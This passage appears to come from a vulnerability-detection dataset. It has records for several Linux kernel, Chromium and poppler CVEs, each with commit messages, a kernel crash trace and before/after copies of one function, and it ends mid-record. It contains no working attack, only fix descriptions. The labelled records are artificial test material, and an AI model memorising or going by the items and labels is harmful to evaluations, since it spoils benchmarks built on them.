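 * setting an ACL, drop S_ISGID unless the caller is in the owning group
 * or holds CAP_FSETID, mirroring what chmod(2) already enforced. */
static mode_t acl_adjusted_mode(mode_t new_mode, gid_t file_gid, gid_t caller_gid)
{
    if (!caller_in_owning_group(file_gid, caller_gid) && !caller_has_fsetid())
        new_mode &= ~S_ISGID;
    return new_mode;
}

int main(void)
{
    mode_t m = acl_adjusted_mode(02755, 100 /* file gid */, 1000 /* caller gid */);
    printf("resulting mode: %o\n", (unsigned int)m);   /* prints 755: setgid cleared */
    return 0;
}
Note that the function stored in this record (xfs_acl_from_disk) is just the snippet captured for the commit; the behavioural change described in the message lives in the generic permission/ACL paths.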
CVE-2019-9003
|
https://www.cvedetails.com/cve/CVE-2019-9003/
|
CWE-416
|
https://github.com/torvalds/linux/commit/77f8269606bf95fcb232ee86f6da80886f1dfae8
|
77f8269606bf95fcb232ee86f6da80886f1dfae8
|
ipmi: fix use-after-free of user->release_barrier.rda
When we do the following test, we got oops in ipmi_msghandler driver
while((1))
do
service ipmievd restart & service ipmievd restart
done
---------------------------------------------------------------
[ 294.230186] Unable to handle kernel paging request at virtual address 0000803fea6ea008
[ 294.230188] Mem abort info:
[ 294.230190] ESR = 0x96000004
[ 294.230191] Exception class = DABT (current EL), IL = 32 bits
[ 294.230193] SET = 0, FnV = 0
[ 294.230194] EA = 0, S1PTW = 0
[ 294.230195] Data abort info:
[ 294.230196] ISV = 0, ISS = 0x00000004
[ 294.230197] CM = 0, WnR = 0
[ 294.230199] user pgtable: 4k pages, 48-bit VAs, pgdp = 00000000a1c1b75a
[ 294.230201] [0000803fea6ea008] pgd=0000000000000000
[ 294.230204] Internal error: Oops: 96000004 [#1] SMP
[ 294.235211] Modules linked in: nls_utf8 isofs rpcrdma ib_iser ib_srpt target_core_mod ib_srp scsi_transport_srp ib_ipoib rdma_ucm ib_umad rdma_cm ib_cm iw_cm dm_mirror dm_region_hash dm_log dm_mod aes_ce_blk crypto_simd cryptd aes_ce_cipher ghash_ce sha2_ce ses sha256_arm64 sha1_ce hibmc_drm hisi_sas_v2_hw enclosure sg hisi_sas_main sbsa_gwdt ip_tables mlx5_ib ib_uverbs marvell ib_core mlx5_core ixgbe ipmi_si mdio hns_dsaf ipmi_devintf ipmi_msghandler hns_enet_drv hns_mdio
[ 294.277745] CPU: 3 PID: 0 Comm: swapper/3 Kdump: loaded Not tainted 5.0.0-rc2+ #113
[ 294.285511] Hardware name: Huawei TaiShan 2280 /BC11SPCD, BIOS 1.37 11/21/2017
[ 294.292835] pstate: 80000005 (Nzcv daif -PAN -UAO)
[ 294.297695] pc : __srcu_read_lock+0x38/0x58
[ 294.301940] lr : acquire_ipmi_user+0x2c/0x70 [ipmi_msghandler]
[ 294.307853] sp : ffff00001001bc80
[ 294.311208] x29: ffff00001001bc80 x28: ffff0000117e5000
[ 294.316594] x27: 0000000000000000 x26: dead000000000100
[ 294.321980] x25: dead000000000200 x24: ffff803f6bd06800
[ 294.327366] x23: 0000000000000000 x22: 0000000000000000
[ 294.332752] x21: ffff00001001bd04 x20: ffff80df33d19018
[ 294.338137] x19: ffff80df33d19018 x18: 0000000000000000
[ 294.343523] x17: 0000000000000000 x16: 0000000000000000
[ 294.348908] x15: 0000000000000000 x14: 0000000000000002
[ 294.354293] x13: 0000000000000000 x12: 0000000000000000
[ 294.359679] x11: 0000000000000000 x10: 0000000000100000
[ 294.365065] x9 : 0000000000000000 x8 : 0000000000000004
[ 294.370451] x7 : 0000000000000000 x6 : ffff80df34558678
[ 294.375836] x5 : 000000000000000c x4 : 0000000000000000
[ 294.381221] x3 : 0000000000000001 x2 : 0000803fea6ea000
[ 294.386607] x1 : 0000803fea6ea008 x0 : 0000000000000001
[ 294.391994] Process swapper/3 (pid: 0, stack limit = 0x0000000083087293)
[ 294.398791] Call trace:
[ 294.401266] __srcu_read_lock+0x38/0x58
[ 294.405154] acquire_ipmi_user+0x2c/0x70 [ipmi_msghandler]
[ 294.410716] deliver_response+0x80/0xf8 [ipmi_msghandler]
[ 294.416189] deliver_local_response+0x28/0x68 [ipmi_msghandler]
[ 294.422193] handle_one_recv_msg+0x158/0xcf8 [ipmi_msghandler]
[ 294.432050] handle_new_recv_msgs+0xc0/0x210 [ipmi_msghandler]
[ 294.441984] smi_recv_tasklet+0x8c/0x158 [ipmi_msghandler]
[ 294.451618] tasklet_action_common.isra.5+0x88/0x138
[ 294.460661] tasklet_action+0x2c/0x38
[ 294.468191] __do_softirq+0x120/0x2f8
[ 294.475561] irq_exit+0x134/0x140
[ 294.482445] __handle_domain_irq+0x6c/0xc0
[ 294.489954] gic_handle_irq+0xb8/0x178
[ 294.497037] el1_irq+0xb0/0x140
[ 294.503381] arch_cpu_idle+0x34/0x1a8
[ 294.510096] do_idle+0x1d4/0x290
[ 294.516322] cpu_startup_entry+0x28/0x30
[ 294.523230] secondary_start_kernel+0x184/0x1d0
[ 294.530657] Code: d538d082 d2800023 8b010c81 8b020021 (c85f7c25)
[ 294.539746] ---[ end trace 8a7a880dee570b29 ]---
[ 294.547341] Kernel panic - not syncing: Fatal exception in interrupt
[ 294.556837] SMP: stopping secondary CPUs
[ 294.563996] Kernel Offset: disabled
[ 294.570515] CPU features: 0x002,21006008
[ 294.577638] Memory Limit: none
[ 294.587178] Starting crashdump kernel...
[ 294.594314] Bye!
Because the user->release_barrier.rda is freed in ipmi_destroy_user(), but
the refcount is not zero, when acquire_ipmi_user() uses user->release_barrier.rda
in __srcu_read_lock(), it causes oops.
Fix this by calling cleanup_srcu_struct() when the refcount is zero.
Fixes: e86ee2d44b44 ("ipmi: Rework locking and shutdown for hot remove")
Cc: stable@vger.kernel.org # 4.18
Signed-off-by: Yang Yingliang <yangyingliang@huawei.com>
Signed-off-by: Corey Minyard <cminyard@mvista.com>
|
static ssize_t device_id_show(struct device *dev,
struct device_attribute *attr,
char *buf)
{
struct bmc_device *bmc = to_bmc_device(dev);
struct ipmi_device_id id;
int rv;
rv = bmc_get_device_id(NULL, bmc, &id, NULL, NULL);
if (rv)
return rv;
return snprintf(buf, 10, "%u\n", id.device_id);
}
|
static ssize_t device_id_show(struct device *dev,
struct device_attribute *attr,
char *buf)
{
struct bmc_device *bmc = to_bmc_device(dev);
struct ipmi_device_id id;
int rv;
rv = bmc_get_device_id(NULL, bmc, &id, NULL, NULL);
if (rv)
return rv;
return snprintf(buf, 10, "%u\n", id.device_id);
}
|
C
|
linux
| 0 |
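The CVE-2019-9003 entry above is a teardown-ordering bug: the SRCU structure in user->release_barrier was cleaned up while readers could still take references, so acquire_ipmi_user() touched freed SRCU state. The fix described in the message defers cleanup_srcu_struct() until the reference count actually drops to zero. The kernel-style sketch below shows that pattern with a kref-counted object; the struct and function names are illustrative, it is not the ipmi_msghandler code and it only builds in a kernel tree:
#include <linux/kernel.h>
#include <linux/kref.h>
#include <linux/slab.h>
#include <linux/srcu.h>

struct user_like {
    struct kref refcount;
    struct srcu_struct release_barrier;
};

static struct user_like *user_like_create(void)
{
    struct user_like *u = kzalloc(sizeof(*u), GFP_KERNEL);

    if (!u)
        return NULL;
    kref_init(&u->refcount);
    if (init_srcu_struct(&u->release_barrier)) {
        kfree(u);
        return NULL;
    }
    return u;
}

/* Runs only when the last reference is dropped, so no reader can still be
 * inside srcu_read_lock(&u->release_barrier) at this point. */
static void user_like_release(struct kref *ref)
{
    struct user_like *u = container_of(ref, struct user_like, refcount);

    cleanup_srcu_struct(&u->release_barrier);   /* deferred to refcount == 0 */
    kfree(u);
}

/* The "destroy" entry point only drops its reference; it must not tear down
 * the SRCU structure itself while other references remain outstanding. */
static void user_like_destroy(struct user_like *u)
{
    kref_put(&u->refcount, user_like_release);
}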
CVE-2016-5218
|
https://www.cvedetails.com/cve/CVE-2016-5218/
|
CWE-20
|
https://github.com/chromium/chromium/commit/45d901b56f578a74b19ba0d10fa5c4c467f19303
|
45d901b56f578a74b19ba0d10fa5c4c467f19303
|
Paint tab groups with the group color.
* The background of TabGroupHeader now uses the group color.
* The backgrounds of tabs in the group are tinted with the group color.
This treatment, along with the colors chosen, are intended to be
a placeholder.
Bug: 905491
Change-Id: Ic808548f8eba23064606e7fb8c9bba281d0d117f
Reviewed-on: https://chromium-review.googlesource.com/c/chromium/src/+/1610504
Commit-Queue: Bret Sepulveda <bsep@chromium.org>
Reviewed-by: Taylor Bergquist <tbergquist@chromium.org>
Cr-Commit-Position: refs/heads/master@{#660498}
|
bool TabStrip::ShouldPaintAsActiveFrame() const {
return controller_->ShouldPaintAsActiveFrame();
}
|
bool TabStrip::ShouldPaintAsActiveFrame() const {
return controller_->ShouldPaintAsActiveFrame();
}
|
C
|
Chrome
| 0 |
CVE-2016-10741
|
https://www.cvedetails.com/cve/CVE-2016-10741/
|
CWE-362
|
https://github.com/torvalds/linux/commit/04197b341f23b908193308b8d63d17ff23232598
|
04197b341f23b908193308b8d63d17ff23232598
|
xfs: don't BUG() on mixed direct and mapped I/O
We've had reports of generic/095 causing XFS to BUG() in
__xfs_get_blocks() due to the existence of delalloc blocks on a
direct I/O read. generic/095 issues a mix of various types of I/O,
including direct and memory mapped I/O to a single file. This is
clearly not supported behavior and is known to lead to such
problems. E.g., the lack of exclusion between the direct I/O and
write fault paths means that a write fault can allocate delalloc
blocks in a region of a file that was previously a hole after the
direct read has attempted to flush/inval the file range, but before
it actually reads the block mapping. In turn, the direct read
discovers a delalloc extent and cannot proceed.
While the appropriate solution here is to not mix direct and memory
mapped I/O to the same regions of the same file, the current
BUG_ON() behavior is probably overkill as it can crash the entire
system. Instead, localize the failure to the I/O in question by
returning an error for a direct I/O that cannot be handled safely
due to delalloc blocks. Be careful to allow the case of a direct
write to post-eof delalloc blocks. This can occur due to speculative
preallocation and is safe as post-eof blocks are not accompanied by
dirty pages in pagecache (conversely, preallocation within eof must
have been zeroed, and thus dirtied, before the inode size could have
been increased beyond said blocks).
Finally, provide an additional warning if a direct I/O write occurs
while the file is memory mapped. This may not catch all problematic
scenarios, but provides a hint that some known-to-be-problematic I/O
methods are in use.
Signed-off-by: Brian Foster <bfoster@redhat.com>
Reviewed-by: Dave Chinner <dchinner@redhat.com>
Signed-off-by: Dave Chinner <david@fromorbit.com>
|
xfs_get_blocks_direct(
struct inode *inode,
sector_t iblock,
struct buffer_head *bh_result,
int create)
{
return __xfs_get_blocks(inode, iblock, bh_result, create, true, false);
}
|
xfs_get_blocks_direct(
struct inode *inode,
sector_t iblock,
struct buffer_head *bh_result,
int create)
{
return __xfs_get_blocks(inode, iblock, bh_result, create, true, false);
}
|
C
|
linux
| 0 |
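The CVE-2016-10741 message above replaces a BUG_ON() with a localized failure: a direct I/O that finds delalloc blocks inside EOF returns an error for just that request instead of crashing the machine, while delalloc beyond EOF (speculative preallocation) stays permitted. The userspace sketch below models only that control flow; the types, the warning text and the -EIO error code are illustrative choices, not the __xfs_get_blocks() internals:
#include <errno.h>
#include <stdbool.h>
#include <stdio.h>

/* Boiled-down view of a block mapping: a real block, a hole, or a
 * delayed-allocation ("delalloc") extent with no disk location yet. */
enum extent_state { EXT_MAPPED, EXT_HOLE, EXT_DELALLOC };

struct mapping_request {
    enum extent_state state;
    long long offset;     /* byte offset being mapped */
    long long file_size;  /* current EOF */
    bool direct;          /* direct I/O path? */
};

/* Hardened check: instead of BUG()-ing on a delalloc extent seen by direct
 * I/O, fail only this request, but still allow delalloc past EOF, which
 * speculative preallocation can legitimately leave behind. */
static int get_blocks_checked(const struct mapping_request *req)
{
    if (req->direct && req->state == EXT_DELALLOC) {
        if (req->offset < req->file_size) {
            fprintf(stderr, "warning: delalloc under direct I/O at %lld\n",
                    req->offset);
            return -EIO;   /* illustrative error code */
        }
        /* post-EOF delalloc: safe, fall through and map it */
    }
    return 0;              /* proceed with the mapping */
}

int main(void)
{
    struct mapping_request in_eof   = { EXT_DELALLOC, 4096,   65536, true };
    struct mapping_request post_eof = { EXT_DELALLOC, 131072, 65536, true };
    printf("in-EOF delalloc:   %d\n", get_blocks_checked(&in_eof));   /* -5 */
    printf("post-EOF delalloc: %d\n", get_blocks_checked(&post_eof)); /* 0 */
    return 0;
}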
CVE-2009-3605
|
https://www.cvedetails.com/cve/CVE-2009-3605/
|
CWE-189
|
https://cgit.freedesktop.org/poppler/poppler/commit/?id=7b2d314a61fd0e12f47c62996cb49ec0d1ba747a
|
7b2d314a61fd0e12f47c62996cb49ec0d1ba747a
| null |
void CairoOutputDev::updateFont(GfxState *state) {
cairo_font_face_t *font_face;
cairo_matrix_t matrix, invert_matrix;
LOG(printf ("updateFont() font=%s\n", state->getFont()->getName()->getCString()));
needFontUpdate = gFalse;
if (text)
text->updateFont(state);
currentFont = fontEngine->getFont (state->getFont(), xref, catalog, printing);
if (!currentFont)
return;
LOG(printf ("font matrix: %f %f %f %f\n", m11, m12, m21, m22));
font_face = currentFont->getFontFace();
cairo_set_font_face (cairo, font_face);
double fontSize = state->getFontSize();
double *m = state->getTextMat();
/* NOTE: adjusting by a constant is hack. The correct solution
* is probably to use user-fonts and compute the scale on a per
* glyph basis instead of for the entire font */
double w = currentFont->getSubstitutionCorrection(state->getFont());
matrix.xx = m[0] * fontSize * state->getHorizScaling() * w;
matrix.yx = m[1] * fontSize * state->getHorizScaling() * w;
matrix.xy = -m[2] * fontSize;
matrix.yy = -m[3] * fontSize;
matrix.x0 = 0;
matrix.y0 = 0;
/* Make sure the font matrix is invertible before setting it. cairo
* will blow up if we give it a matrix that's not invertible, so we
* need to check before passing it to cairo_set_font_matrix. Ignoring it
* is likely to give better results than not rendering anything at
* all. See #18254.
*/
invert_matrix = matrix;
if (cairo_matrix_invert(&invert_matrix)) {
warning("font matrix not invertible\n");
return;
}
cairo_set_font_matrix (cairo, &matrix);
}
|
void CairoOutputDev::updateFont(GfxState *state) {
cairo_font_face_t *font_face;
cairo_matrix_t matrix, invert_matrix;
LOG(printf ("updateFont() font=%s\n", state->getFont()->getName()->getCString()));
needFontUpdate = gFalse;
if (text)
text->updateFont(state);
currentFont = fontEngine->getFont (state->getFont(), xref, catalog, printing);
if (!currentFont)
return;
LOG(printf ("font matrix: %f %f %f %f\n", m11, m12, m21, m22));
font_face = currentFont->getFontFace();
cairo_set_font_face (cairo, font_face);
double fontSize = state->getFontSize();
double *m = state->getTextMat();
/* NOTE: adjusting by a constant is hack. The correct solution
* is probably to use user-fonts and compute the scale on a per
* glyph basis instead of for the entire font */
double w = currentFont->getSubstitutionCorrection(state->getFont());
matrix.xx = m[0] * fontSize * state->getHorizScaling() * w;
matrix.yx = m[1] * fontSize * state->getHorizScaling() * w;
matrix.xy = -m[2] * fontSize;
matrix.yy = -m[3] * fontSize;
matrix.x0 = 0;
matrix.y0 = 0;
/* Make sure the font matrix is invertible before setting it. cairo
* will blow up if we give it a matrix that's not invertible, so we
* need to check before passing it to cairo_set_font_matrix. Ignoring it
* is likely to give better results than not rendering anything at
* all. See #18254.
*/
invert_matrix = matrix;
if (cairo_matrix_invert(&invert_matrix)) {
warning("font matrix not invertible\n");
return;
}
cairo_set_font_matrix (cairo, &matrix);
}
|
CPP
|
poppler
| 0 |
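The updateFont() code in the entry above guards cairo_set_font_matrix() by first running cairo_matrix_invert() on a copy, because cairo cannot handle a non-invertible font matrix and the poppler code prefers to skip the update rather than fail hard. A small standalone check of that API behaviour (the matrix values are arbitrary examples):
#include <cairo.h>
#include <stdio.h>

/* Returns 1 if 'm' can be inverted, mirroring the guard used before
 * cairo_set_font_matrix() in CairoOutputDev::updateFont(). */
static int matrix_is_invertible(const cairo_matrix_t *m)
{
    cairo_matrix_t copy = *m;   /* invert a copy so 'm' stays intact */
    return cairo_matrix_invert(&copy) == CAIRO_STATUS_SUCCESS;
}

int main(void)
{
    cairo_matrix_t ok, singular;

    cairo_matrix_init(&ok, 12.0, 0.0, 0.0, -12.0, 0.0, 0.0);      /* typical font matrix */
    cairo_matrix_init(&singular, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0);   /* degenerate: det == 0 */

    printf("ok matrix invertible: %d\n", matrix_is_invertible(&ok));        /* 1 */
    printf("singular invertible:  %d\n", matrix_is_invertible(&singular));  /* 0 */
    return 0;
}
Built with something like: cc demo.c $(pkg-config --cflags --libs cairo).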
CVE-2019-5837
|
https://www.cvedetails.com/cve/CVE-2019-5837/
|
CWE-200
|
https://github.com/chromium/chromium/commit/04aaacb936a08d70862d6d9d7e8354721ae46be8
|
04aaacb936a08d70862d6d9d7e8354721ae46be8
|
Reland "AppCache: Add padding to cross-origin responses."
This is a reland of 85b389caa7d725cdd31f59e9a2b79ff54804b7b7
Initialized CacheRecord::padding_size to 0.
Original change's description:
> AppCache: Add padding to cross-origin responses.
>
> Bug: 918293
> Change-Id: I4f16640f06feac009d6bbbb624951da6d2669f6c
> Reviewed-on: https://chromium-review.googlesource.com/c/chromium/src/+/1488059
> Commit-Queue: Staphany Park <staphany@chromium.org>
> Reviewed-by: Victor Costan <pwnall@chromium.org>
> Reviewed-by: Marijn Kruisselbrink <mek@chromium.org>
> Cr-Commit-Position: refs/heads/master@{#644624}
Bug: 918293
Change-Id: Ie1d3f99c7e8a854d33255a4d66243da2ce16441c
Reviewed-on: https://chromium-review.googlesource.com/c/chromium/src/+/1539906
Reviewed-by: Victor Costan <pwnall@chromium.org>
Commit-Queue: Staphany Park <staphany@chromium.org>
Cr-Commit-Position: refs/heads/master@{#644719}
|
void MakeMultipleHitCacheAndGroup(const GURL& manifest_url, int id) {
MakeCacheAndGroup(manifest_url, id, id, true);
AppCacheDatabase::EntryRecord entry_record;
entry_record.cache_id = id;
entry_record.url = kEntryUrl;
entry_record.flags = AppCacheEntry::EXPLICIT;
entry_record.response_id = id;
EXPECT_TRUE(database()->InsertEntry(&entry_record));
cache_->AddEntry(entry_record.url, AppCacheEntry(entry_record.flags,
entry_record.response_id));
entry_record.cache_id = id;
entry_record.url = manifest_url;
entry_record.flags = AppCacheEntry::MANIFEST;
entry_record.response_id = id + kManifestEntryIdOffset;
EXPECT_TRUE(database()->InsertEntry(&entry_record));
cache_->AddEntry(entry_record.url, AppCacheEntry(entry_record.flags,
entry_record.response_id));
entry_record.cache_id = id;
entry_record.url = kEntryUrl2;
entry_record.flags = AppCacheEntry::FALLBACK;
entry_record.response_id = id + kFallbackEntryIdOffset;
EXPECT_TRUE(database()->InsertEntry(&entry_record));
cache_->AddEntry(entry_record.url, AppCacheEntry(entry_record.flags,
entry_record.response_id));
AppCacheDatabase::NamespaceRecord fallback_namespace_record;
fallback_namespace_record.cache_id = id;
fallback_namespace_record.namespace_.target_url = entry_record.url;
fallback_namespace_record.namespace_.namespace_url = kFallbackNamespace;
fallback_namespace_record.origin = url::Origin::Create(manifest_url);
EXPECT_TRUE(database()->InsertNamespace(&fallback_namespace_record));
cache_->fallback_namespaces_.push_back(AppCacheNamespace(
APPCACHE_FALLBACK_NAMESPACE, kFallbackNamespace, kEntryUrl2, false));
}
|
void MakeMultipleHitCacheAndGroup(const GURL& manifest_url, int id) {
MakeCacheAndGroup(manifest_url, id, id, true);
AppCacheDatabase::EntryRecord entry_record;
entry_record.cache_id = id;
entry_record.url = kEntryUrl;
entry_record.flags = AppCacheEntry::EXPLICIT;
entry_record.response_id = id;
EXPECT_TRUE(database()->InsertEntry(&entry_record));
cache_->AddEntry(entry_record.url, AppCacheEntry(entry_record.flags,
entry_record.response_id));
entry_record.cache_id = id;
entry_record.url = manifest_url;
entry_record.flags = AppCacheEntry::MANIFEST;
entry_record.response_id = id + kManifestEntryIdOffset;
EXPECT_TRUE(database()->InsertEntry(&entry_record));
cache_->AddEntry(entry_record.url, AppCacheEntry(entry_record.flags,
entry_record.response_id));
entry_record.cache_id = id;
entry_record.url = kEntryUrl2;
entry_record.flags = AppCacheEntry::FALLBACK;
entry_record.response_id = id + kFallbackEntryIdOffset;
EXPECT_TRUE(database()->InsertEntry(&entry_record));
cache_->AddEntry(entry_record.url, AppCacheEntry(entry_record.flags,
entry_record.response_id));
AppCacheDatabase::NamespaceRecord fallback_namespace_record;
fallback_namespace_record.cache_id = id;
fallback_namespace_record.namespace_.target_url = entry_record.url;
fallback_namespace_record.namespace_.namespace_url = kFallbackNamespace;
fallback_namespace_record.origin = url::Origin::Create(manifest_url);
EXPECT_TRUE(database()->InsertNamespace(&fallback_namespace_record));
cache_->fallback_namespaces_.push_back(AppCacheNamespace(
APPCACHE_FALLBACK_NAMESPACE, kFallbackNamespace, kEntryUrl2, false));
}
|
C
|
Chrome
| 0 |
CVE-2011-2785
|
https://www.cvedetails.com/cve/CVE-2011-2785/
|
CWE-20
|
https://github.com/chromium/chromium/commit/697cd7e2ce2535696f1b9e5cfb474cc36a734747
|
697cd7e2ce2535696f1b9e5cfb474cc36a734747
|
Prevent extensions from defining homepages with schemes other than valid web extents.
BUG=84402
TEST=ExtensionManifestTest.ParseHomepageURLs
Review URL: http://codereview.chromium.org/7089014
git-svn-id: svn://svn.chromium.org/chrome/trunk/src@87722 0039d316-1c4b-4281-b951-d872f2087c98
|
bool Extension::InitFromValue(const DictionaryValue& source, int flags,
std::string* error) {
URLPattern::ParseOption parse_strictness =
(flags & STRICT_ERROR_CHECKS ? URLPattern::PARSE_STRICT
: URLPattern::PARSE_LENIENT);
if (source.HasKey(keys::kPublicKey)) {
std::string public_key_bytes;
if (!source.GetString(keys::kPublicKey,
&public_key_) ||
!ParsePEMKeyBytes(public_key_,
&public_key_bytes) ||
!GenerateId(public_key_bytes, &id_)) {
*error = errors::kInvalidKey;
return false;
}
} else if (flags & REQUIRE_KEY) {
*error = errors::kInvalidKey;
return false;
} else {
id_ = Extension::GenerateIdForPath(path());
if (id_.empty()) {
NOTREACHED() << "Could not create ID from path.";
return false;
}
}
manifest_value_.reset(source.DeepCopy());
extension_url_ = Extension::GetBaseURLFromExtensionId(id());
std::string version_str;
if (!source.GetString(keys::kVersion, &version_str)) {
*error = errors::kInvalidVersion;
return false;
}
version_.reset(Version::GetVersionFromString(version_str));
if (!version_.get() ||
version_->components().size() > 4) {
*error = errors::kInvalidVersion;
return false;
}
string16 localized_name;
if (!source.GetString(keys::kName, &localized_name)) {
*error = errors::kInvalidName;
return false;
}
base::i18n::AdjustStringForLocaleDirection(&localized_name);
name_ = UTF16ToUTF8(localized_name);
if (source.HasKey(keys::kDescription)) {
if (!source.GetString(keys::kDescription,
&description_)) {
*error = errors::kInvalidDescription;
return false;
}
}
if (source.HasKey(keys::kHomepageURL)) {
std::string tmp;
if (!source.GetString(keys::kHomepageURL, &tmp)) {
*error = ExtensionErrorUtils::FormatErrorMessage(
errors::kInvalidHomepageURL, "");
return false;
}
homepage_url_ = GURL(tmp);
if (!homepage_url_.is_valid() ||
(!homepage_url_.SchemeIs("http") &&
!homepage_url_.SchemeIs("https"))) {
*error = ExtensionErrorUtils::FormatErrorMessage(
errors::kInvalidHomepageURL, tmp);
return false;
}
}
if (source.HasKey(keys::kUpdateURL)) {
std::string tmp;
if (!source.GetString(keys::kUpdateURL, &tmp)) {
*error = ExtensionErrorUtils::FormatErrorMessage(
errors::kInvalidUpdateURL, "");
return false;
}
update_url_ = GURL(tmp);
if (!update_url_.is_valid() ||
update_url_.has_ref()) {
*error = ExtensionErrorUtils::FormatErrorMessage(
errors::kInvalidUpdateURL, tmp);
return false;
}
}
if (source.HasKey(keys::kMinimumChromeVersion)) {
std::string minimum_version_string;
if (!source.GetString(keys::kMinimumChromeVersion,
&minimum_version_string)) {
*error = errors::kInvalidMinimumChromeVersion;
return false;
}
scoped_ptr<Version> minimum_version(
Version::GetVersionFromString(minimum_version_string));
if (!minimum_version.get()) {
*error = errors::kInvalidMinimumChromeVersion;
return false;
}
chrome::VersionInfo current_version_info;
if (!current_version_info.is_valid()) {
NOTREACHED();
return false;
}
scoped_ptr<Version> current_version(
Version::GetVersionFromString(current_version_info.Version()));
if (!current_version.get()) {
DCHECK(false);
return false;
}
if (current_version->CompareTo(*minimum_version) < 0) {
*error = ExtensionErrorUtils::FormatErrorMessage(
errors::kChromeVersionTooLow,
l10n_util::GetStringUTF8(IDS_PRODUCT_NAME),
minimum_version_string);
return false;
}
}
source.GetBoolean(keys::kConvertedFromUserScript,
&converted_from_user_script_);
if (source.HasKey(keys::kIcons)) {
DictionaryValue* icons_value = NULL;
if (!source.GetDictionary(keys::kIcons, &icons_value)) {
*error = errors::kInvalidIcons;
return false;
}
for (size_t i = 0; i < arraysize(kIconSizes); ++i) {
std::string key = base::IntToString(kIconSizes[i]);
if (icons_value->HasKey(key)) {
std::string icon_path;
if (!icons_value->GetString(key, &icon_path)) {
*error = ExtensionErrorUtils::FormatErrorMessage(
errors::kInvalidIconPath, key);
return false;
}
if (!icon_path.empty() && icon_path[0] == '/')
icon_path = icon_path.substr(1);
if (icon_path.empty()) {
*error = ExtensionErrorUtils::FormatErrorMessage(
errors::kInvalidIconPath, key);
return false;
}
icons_.Add(kIconSizes[i], icon_path);
}
}
}
is_theme_ = false;
if (source.HasKey(keys::kTheme)) {
if (ContainsNonThemeKeys(source)) {
*error = errors::kThemesCannotContainExtensions;
return false;
}
DictionaryValue* theme_value = NULL;
if (!source.GetDictionary(keys::kTheme, &theme_value)) {
*error = errors::kInvalidTheme;
return false;
}
is_theme_ = true;
DictionaryValue* images_value = NULL;
if (theme_value->GetDictionary(keys::kThemeImages, &images_value)) {
for (DictionaryValue::key_iterator iter = images_value->begin_keys();
iter != images_value->end_keys(); ++iter) {
std::string val;
if (!images_value->GetString(*iter, &val)) {
*error = errors::kInvalidThemeImages;
return false;
}
}
theme_images_.reset(images_value->DeepCopy());
}
DictionaryValue* colors_value = NULL;
if (theme_value->GetDictionary(keys::kThemeColors, &colors_value)) {
for (DictionaryValue::key_iterator iter = colors_value->begin_keys();
iter != colors_value->end_keys(); ++iter) {
ListValue* color_list = NULL;
double alpha = 0.0;
int color = 0;
if (!colors_value->GetListWithoutPathExpansion(*iter, &color_list) ||
((color_list->GetSize() != 3) &&
((color_list->GetSize() != 4) ||
!color_list->GetDouble(3, &alpha))) ||
!color_list->GetInteger(0, &color) ||
!color_list->GetInteger(1, &color) ||
!color_list->GetInteger(2, &color)) {
*error = errors::kInvalidThemeColors;
return false;
}
}
theme_colors_.reset(colors_value->DeepCopy());
}
DictionaryValue* tints_value = NULL;
if (theme_value->GetDictionary(keys::kThemeTints, &tints_value)) {
for (DictionaryValue::key_iterator iter = tints_value->begin_keys();
iter != tints_value->end_keys(); ++iter) {
ListValue* tint_list = NULL;
double v = 0.0;
if (!tints_value->GetListWithoutPathExpansion(*iter, &tint_list) ||
tint_list->GetSize() != 3 ||
!tint_list->GetDouble(0, &v) ||
!tint_list->GetDouble(1, &v) ||
!tint_list->GetDouble(2, &v)) {
*error = errors::kInvalidThemeTints;
return false;
}
}
theme_tints_.reset(tints_value->DeepCopy());
}
DictionaryValue* display_properties_value = NULL;
if (theme_value->GetDictionary(keys::kThemeDisplayProperties,
&display_properties_value)) {
theme_display_properties_.reset(
display_properties_value->DeepCopy());
}
return true;
}
if (source.HasKey(keys::kPlugins)) {
ListValue* list_value = NULL;
if (!source.GetList(keys::kPlugins, &list_value)) {
*error = errors::kInvalidPlugins;
return false;
}
for (size_t i = 0; i < list_value->GetSize(); ++i) {
DictionaryValue* plugin_value = NULL;
std::string path_str;
bool is_public = false;
if (!list_value->GetDictionary(i, &plugin_value)) {
*error = errors::kInvalidPlugins;
return false;
}
if (!plugin_value->GetString(keys::kPluginsPath, &path_str)) {
*error = ExtensionErrorUtils::FormatErrorMessage(
errors::kInvalidPluginsPath, base::IntToString(i));
return false;
}
if (plugin_value->HasKey(keys::kPluginsPublic)) {
if (!plugin_value->GetBoolean(keys::kPluginsPublic, &is_public)) {
*error = ExtensionErrorUtils::FormatErrorMessage(
errors::kInvalidPluginsPublic, base::IntToString(i));
return false;
}
}
#if !defined(OS_CHROMEOS)
plugins_.push_back(PluginInfo());
plugins_.back().path = path().AppendASCII(path_str);
plugins_.back().is_public = is_public;
#endif
}
}
if (CommandLine::ForCurrentProcess()->HasSwitch(
switches::kEnableExperimentalExtensionApis) &&
source.HasKey(keys::kNaClModules)) {
ListValue* list_value = NULL;
if (!source.GetList(keys::kNaClModules, &list_value)) {
*error = errors::kInvalidNaClModules;
return false;
}
for (size_t i = 0; i < list_value->GetSize(); ++i) {
DictionaryValue* module_value = NULL;
std::string path_str;
std::string mime_type;
if (!list_value->GetDictionary(i, &module_value)) {
*error = errors::kInvalidNaClModules;
return false;
}
if (!module_value->GetString(keys::kNaClModulesPath, &path_str)) {
*error = ExtensionErrorUtils::FormatErrorMessage(
errors::kInvalidNaClModulesPath, base::IntToString(i));
return false;
}
if (!module_value->GetString(keys::kNaClModulesMIMEType, &mime_type)) {
*error = ExtensionErrorUtils::FormatErrorMessage(
errors::kInvalidNaClModulesMIMEType, base::IntToString(i));
return false;
}
nacl_modules_.push_back(NaClModuleInfo());
nacl_modules_.back().url = GetResourceURL(path_str);
nacl_modules_.back().mime_type = mime_type;
}
}
if (CommandLine::ForCurrentProcess()->HasSwitch(
switches::kEnableExperimentalExtensionApis) &&
source.HasKey(keys::kToolstrips)) {
ListValue* list_value = NULL;
if (!source.GetList(keys::kToolstrips, &list_value)) {
*error = errors::kInvalidToolstrips;
return false;
}
for (size_t i = 0; i < list_value->GetSize(); ++i) {
GURL toolstrip;
DictionaryValue* toolstrip_value = NULL;
std::string toolstrip_path;
if (list_value->GetString(i, &toolstrip_path)) {
toolstrip = GetResourceURL(toolstrip_path);
} else if (list_value->GetDictionary(i, &toolstrip_value)) {
if (!toolstrip_value->GetString(keys::kToolstripPath,
&toolstrip_path)) {
*error = ExtensionErrorUtils::FormatErrorMessage(
errors::kInvalidToolstrip, base::IntToString(i));
return false;
}
toolstrip = GetResourceURL(toolstrip_path);
} else {
